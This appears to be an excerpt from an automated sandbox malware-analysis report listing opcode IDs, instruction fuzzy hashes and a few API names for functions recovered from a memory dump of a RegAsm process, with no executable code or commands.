                                                      • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                      • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf8f587253e202915e805cc75018ac22b9bd56b94549da316b175cb94c1d98b7
                                                      • Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
                                                      • Opcode Fuzzy Hash: cf8f587253e202915e805cc75018ac22b9bd56b94549da316b175cb94c1d98b7
                                                      • Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                      • Instruction ID: c7afa36b394fec79d3864c076b52a9d2828a05187d2106694a5d2b7072183649
                                                      • Opcode Fuzzy Hash: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                      • Instruction Fuzzy Hash: 30A11571205701CFD329CF28C4A19A777E2FF8A310719869DD4A68B3A5EB38AC41CB54
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
                                                      • Instruction ID: 3a875cd6648c61770c451858fbf1e99b01c2ef70bfb09da3693ab00193ad4cb1
                                                      • Opcode Fuzzy Hash: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
                                                      • Instruction Fuzzy Hash: 478134B15143048BC728DF24D8A26B7B3F0EF95354F08892EE98687391F738D989C766
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
                                                      • Instruction ID: 4462778536881e7fad7e7429092b9e4e0939b3ac367c8c146f109192ca963606
                                                      • Opcode Fuzzy Hash: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
                                                      • Instruction Fuzzy Hash: 22B1E4B5D04301AFD7109F24CC42B5BBBE1ABD5318F144A3EF8D8A32A1D7399945DB8A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                      • Instruction ID: 82f263c77167ee55bcd91cd3b2c817a9180a54af617eadf61d99f91933eb0c98
                                                      • Opcode Fuzzy Hash: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                      • Instruction Fuzzy Hash: 28B15B72E04B918FC715CA7CCC8169ABFB25B9B230F1DC399D4A5DB3D6C63998028761
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                      • Instruction ID: 6c2276beaf566b9a9bdc1ff0447d0761e6db3ed1e3725ba86175889a0c87908a
                                                      • Opcode Fuzzy Hash: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                      • Instruction Fuzzy Hash: D5C16CB29087418FC360CF28DC96BABB7E1BF85318F09493DD1DAD6242D778A155CB0A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2f2405ba8501e732ea9b84d4f1d17a44deec420c9e3b37a34c35b376b07d1a00
                                                      • Instruction ID: 64328250301a943c4221b3aea1d0af6b203cdad55f8ce28cbce5e8ab6c8a38f2
                                                      • Opcode Fuzzy Hash: 2f2405ba8501e732ea9b84d4f1d17a44deec420c9e3b37a34c35b376b07d1a00
                                                      • Instruction Fuzzy Hash: 1D812035A08310AFC7248F18D881A6FB7E2EF89314F14992DF9958B391DB35EC51CB86
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                      • Instruction ID: c9f1a56c5cc6f557c9c63b1b84e3a6a9080bfa3b27e02a379f5ce7dab310694a
                                                      • Opcode Fuzzy Hash: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
                                                      • Instruction Fuzzy Hash: 75711673B499904BE328893C4C213AB6A830FD6230F2DC77AE5B68B3E5D5698C468345
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c1f2a911f0e81fcfb538e69c42d8226a7e147b8ce54a13b9f510f8c7205baf4
                                                      • Instruction ID: e0a57f83dc16a7a8da3cda248db75e741f620206b22b691e391221bf57496f6d
                                                      • Opcode Fuzzy Hash: 6c1f2a911f0e81fcfb538e69c42d8226a7e147b8ce54a13b9f510f8c7205baf4
                                                      • Instruction Fuzzy Hash: B8616837B193105BD718CE69CC9066BB7D2ABCD320F09922EE995833D1CAB88C02C385
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                      • Instruction ID: 93e46a8bd3da194c47575791ec0c02f08c3a6f4472264f5d459ff5c5938f4a7b
                                                      • Opcode Fuzzy Hash: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
                                                      • Instruction Fuzzy Hash: BF712827B49AA04BD318893C5C612A66AA30FD2330FEDC77FE9F1473D5D5694C0A8359
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                      • Instruction ID: bd453bbf85e71c37a0fde588b6316f789c56ba706437bc4c9fe4a45325bf71d6
                                                      • Opcode Fuzzy Hash: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
                                                      • Instruction Fuzzy Hash: 6771AF72D043689FEB25CFA9CD817DDBBB2FB80310F18816DD459AB289DB741946CB84
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                      • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                      • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                      • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                      • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                      • Opcode Fuzzy Hash: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                      • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                      • Instruction ID: c2a6bcafcd54fac281a485024f5f1ed9cd6e16fab59c4b6ddada49184fd56f0c
                                                      • Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
                                                      • Instruction Fuzzy Hash: AB516BB15087548FE314DF29D49435BBBE1BBC8318F444A2EE4E987351E379DA088F86
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                      • Instruction ID: d7cad542098786fb583f31be900ecfd8ec374eacf30312457ad000f908a343a7
                                                      • Opcode Fuzzy Hash: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
                                                      • Instruction Fuzzy Hash: 46512433A5A9D04BD32C853C4C623A66AD30BDA330F2DA77BE5B1CB3E1C56D88064355
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                      • Instruction ID: 3e54edccfae4d99a9dc067fb7438e7a0f7318be64c596df77be4d10cba28c441
                                                      • Opcode Fuzzy Hash: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                      • Instruction Fuzzy Hash: E651A173B569104BC71CC93C9DA166AA6D3ABD933076E873DD476CB7D4EE78E8028600
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                      • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                      • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                      • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                      • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                      • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                      • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                      • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                      • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                      • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd8906fdad29a51b8e9e884aeb17347e4e6cb46e2169fa8a0d26abd483c1d7b8
                                                      • Instruction ID: bdc763d3058119611c7ecd8a8528ac1cd9b09ae5f9eb0b7e174c524916cf2ae7
                                                      • Opcode Fuzzy Hash: cd8906fdad29a51b8e9e884aeb17347e4e6cb46e2169fa8a0d26abd483c1d7b8
                                                      • Instruction Fuzzy Hash: 6A41F33A308610CFCB08CF78E9E055A73A2FBCB315F29847DD54547622C775A956CB44
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                      • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                      • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                      • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                      • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                      • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                      • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                      • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                      • Opcode Fuzzy Hash: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                      • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                      • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                      • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                      • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                      • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                      • Opcode Fuzzy Hash: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                      • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                      • Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
                                                      • Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                      • Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                      • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                      • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                      • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                      • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                      • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                      • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                      • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                      • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                      • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                      • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                      • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                      • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                      • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                      • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                      • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                      • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                      • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                      • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: L
                                                      • API String ID: 2610073882-2909332022
                                                      • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                      • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                      • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                      • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem
                                                      • String ID:
                                                      • API String ID: 4116985748-3916222277
